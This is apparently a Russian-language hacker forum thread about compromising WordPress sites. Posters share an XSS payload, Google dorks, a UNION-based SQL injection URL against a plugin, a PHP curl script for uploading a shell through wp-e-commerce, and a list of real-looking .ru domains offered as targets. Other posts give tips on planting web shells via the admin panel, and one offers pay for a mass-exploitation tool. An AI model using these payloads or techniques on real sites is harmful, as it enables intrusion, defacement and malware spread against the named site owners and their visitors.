Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят? Есть папка uploads, где видно все файлы. Значит где то есть uploader?
Просканируй сайт этой прогой Web Vulnerability Scanner 8 там будет папка wp-content/plugins Так вот в ней и лежал плагины
Версия 3.5 и 3.5.1 Чтобы воспользоваться ниже упомянутой уязвимостью нужно иметь права редактора или администратора, то есть права на размещение/редактирование новостей. При размещении в тело сообщения JavaScript кода: Code: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> после чего и срабатывает уязвимость. Таким образом мы видим, что злоумышленник может получить возможность атаковать всех пользователей, которые просто зайдут почитать размещённую новость или статью. При определенных манипуляциях с кодом можно также заразить массу посетителей сайта вирусом, перенаправляя их на вредоносный сайт.
все облазил) никак не получается шелл впихнуть на wp 3.3. при загрузке плагинов\тем просит FTP доступ напомнить ему. редактор не помогает. Есть варианты какие нибудь? EDIT Все мои попытки загружать медиафайлы отображаются в графе Медиафайлы (с пометкой что не прикреплены или еще что нибудь) жмем редактировать -> узнаем путь -> профит. может пригодится кому нибудь)
WordPress marker_listings.xml SQL injection Google dork: Code: inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=" Vulnerable script: Code: h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+
очередная возможность узнать версию вордпресс файл redame.html в корневой папке с блогом пример http://www.lasalle.edu/readme.html http://www.blackandabroad.com/readme.html
formcraft Plugin Sql Injection файл /wp-content/plugins/formcraft/form.php PHP: <?php require('../../../wp-blog-header.php'); global $wpdb, $table_subs, $table_builder, $table_info; $myrows = $wpdb->get_results( "SELECT * FROM $table_builder WHERE id=$_GET[id]", "ARRAY_A" ); $con = stripslashes($myrows[0]['con']); $con = json_decode($con, 1); inurl:"plugins/formcraft/"
какой есть еще способ залиться в wp ? при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.
Сейчас как раз дописываю одну вещь по аплоаду в WP. Если есть желание и трудный сайт - помогу в рамках тестирования продукта в ПМ.
Custom Content Type Manager Code: url : http://yoursite.com/wp-content/plugins/custom-content-type-manager/ajax-controllers/download_def.php скачать .json вид Admin Email
Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities PHP: <?php $headers = array("Content-Type: application/octet-stream", "Content-Disposition: form-data; name=\"image\"; file=\"onlyimage.gif\";"); $uploadfile="file.php"; $ch = curl_init("http://DOMAIN/wp-content/plugins/wp-e-commerce/wpsc-admin/includes/save-data.functions.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POSTFIELDS, array('image'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> ©Взято от Сюда Вот только не заливается шелл немогу понять в чём причина, кто разберется будьте добры помочь, вот Вам домены для теста: Code: http://1CCLUB.RU/wp-content/plugins/wp-e-commerce/readme.txt http://40MOBILE.RU/wp-content/plugins/wp-e-commerce/readme.txt http://4WR.RU/wp-content/plugins/wp-e-commerce/readme.txt http://9899669.RU/wp-content/plugins/wp-e-commerce/readme.txt http://AFSERVICE.RU/wp-content/plugins/wp-e-commerce/readme.txt http://AISBERG24.RU/wp-content/plugins/wp-e-commerce/readme.txt http://ALL-HTC.RU/wp-content/plugins/wp-e-commerce/readme.txt http://ALTERKRESLA.RU/wp-content/plugins/wp-e-commerce/readme.txt http://AMARTCOM.RU/wp-content/plugins/wp-e-commerce/readme.txt http://angel23.ru/wp-content/plugins/wp-e-commerce/readme.txt http://ANTIKFOREVERY1.RU/wp-content/plugins/wp-e-commerce/readme.txt http://APIKLIN.RU/wp-content/plugins/wp-e-commerce/readme.txt http://APK-NN.RU/wp-content/plugins/wp-e-commerce/readme.txt http://ARCHIMEDNOV.RU/wp-content/plugins/wp-e-commerce/readme.txt http://ARENDAMD.RU/wp-content/plugins/wp-e-commerce/readme.txt Домены именно той версии которую требует уязвимость.
Есть админка вордпресс , как залить шелл? Редактировать файлы 404 и другие запрещено (нет прав на запись файлов темы) плагин не устанавливается( нужна авторизация FTP ) WP ниже 3.8.1 Совет от xPriZrAkx не помог ,он просто при нажатии просит пароль и не заливает Способ с 2 админами тоже не катит
Редактировать а не устанавливать плагины. Может быть проверка контрольной суммы, так что выбирать плагин с кол-вом строк >=, чем в шеле. P.s. Ну и сам шелл возьми из паблика, с минимальным кол-вом строк, потом свой перезальешь.
хм Народ, а кто бы мог написать обработчик експа CKEditor 4.0 http://1337day.com/exploit/20318 ? Сорец на perl есть, с какой то ошибкой. Ну, и само собой что бы он обрабатывал по списку. ( ясен пень что не за бесплатно ) .